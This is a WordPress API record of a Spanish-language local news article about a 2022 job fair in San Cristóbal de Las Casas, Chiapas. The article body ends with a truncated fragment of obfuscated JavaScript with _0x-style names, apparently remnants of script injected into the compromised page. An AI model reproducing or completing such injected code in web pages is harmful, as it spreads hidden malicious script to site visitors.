{"id":3177,"date":"2022-06-24T03:18:05","date_gmt":"2022-06-24T03:18:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3177"},"modified":"2022-06-24T03:18:06","modified_gmt":"2022-06-24T03:18:06","slug":"realizan-feria-del-empleo-en-la-zona-altos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3177","title":{"rendered":"Realizan feria del empleo en la zona Altos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-23-at-4.22.38-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-3178\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-23-at-4.22.38-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-23-at-4.22.38-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-23-at-4.22.38-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-23-at-4.22.38-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas. &#8211; Con la participaci\u00f3n de m\u00e1s de 30 empresas renombradas, que ofrecieron unas 250 vacantes, se realiz\u00f3 en San Crist\u00f3bal la Feria del Empleo 2022 organizado por la Secretar\u00eda de Econom\u00eda y del Trabajo, quien funge como instancia facilitadora a la poblaci\u00f3n que necesita un trabajo. Al respecto, Eray Su\u00e1rez, delegado de esta dependencia, coment\u00f3 que se ofrecieron empleos de empresas for\u00e1neas como Chihuahua, Monterrey, Playa del Carmen, que ofrecen un contrato por 3 meses con sueldos que van desde los 3 mil 800 pesos hasta los 9 mil, donde incluyen transporte, hospedaje y alimentaci\u00f3n. Indic\u00f3 que existe muy buena coordinaci\u00f3n entre la dependencia estatal y el Municipio de San Crist\u00f3bal de Las Casas, para la realizaci\u00f3n de la Feria del Empleo 2022, y con esto la gente se reactive econ\u00f3micamente, a trav\u00e9s de un empleo digno y mejor pagado. \u201cDe esta forma, el Gobierno del Estado ratifica su compromiso de fortalecer los mecanismos y estrategias con el objetivo de vincular de manera eficiente a buscadores de empleo con empleadores, logrando su colocaci\u00f3n en un puesto de trabajo y satisfaciendo los requerimientos de personal de una manera \u00e1gil y oportuna y en un mismo lugar\u201d. Por \u00faltimo, coment\u00f3 que tambi\u00e9n se coordinaron con las dem\u00e1s presidencias municipales de la Regi\u00f3n Altos como Chalchihuit\u00e1n, Chamula, Tenejapa, que dieron difusi\u00f3n a la feria e incluso acudieron personas interesadas de esos municipios al evento, por lo que esperan para el mes de septiembre tener un evento similar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas. &#8211; Con la participaci\u00f3n de m\u00e1s de 30 empresas renombradas, que ofrecieron unas 250 vacantes, se realiz\u00f3 en San Crist\u00f3bal la Feria del Empleo 2022 organizado por la Secretar\u00eda de Econom\u00eda y del Trabajo, quien funge como instancia facilitadora a la poblaci\u00f3n que necesita un trabajo. Al respecto, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3178,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3177","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3177","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3177"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3177\/revisions"}],"predecessor-version":[{"id":3179,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3177\/revisions\/3179"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3178"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3177"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3177"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3177"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}